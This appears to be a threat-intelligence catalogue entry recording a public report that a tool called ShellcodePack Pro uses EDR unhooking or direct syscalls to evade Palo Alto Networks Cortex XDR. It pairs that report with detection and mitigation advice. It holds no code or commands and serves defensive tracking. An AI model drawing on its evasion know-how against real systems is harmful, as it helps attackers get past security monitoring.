EDR Unhooking × Palo Alto Networks Cortex XDR

A publicly-reported instance of EDR Unhooking bypassing Palo Alto Networks Cortex XDR, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Palo Alto Networks Cortex XDR

Technique

EDR Unhooking

MITRE ATT&CK

T1562.001

Confidence

Medium

Severity

High

Status

poc

Disclosed

2025-10-18

Config / version noted

Not stated

Provenance

www.brinztech.com
disclosed 2025-10-18 · original source · via raw

Reported as

ShellcodePack Pro executes shellcode payloads using techniques that bypass CrowdStrike and Cortex EDR detection

Mechanism

ShellcodePack Pro executes shellcode payloads using techniques that bypass CrowdStrike and Cortex EDR detection, likely through methods such as direct syscalls, unhooking, or other evasion tactics. It defeats signature-based and possibly behavioral detection by these specific EDRs.

Detection & mitigation

Focus on behavioral detection: monitor for suspicious process creation (e.g., Office spawning PowerShell), memory scraping, or C2 connections. Ensure EDR policies are set to block/quarantine and tune behavioral rules to flag post-exploitation actions even if initial loader evades signature detection.

EDR Unhooking has also been recorded against

all major EDR solutions Bitdefender CrowdStrike Elastic major EDR vendor (unnamed)Microsoft SentinelOne Sophos

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.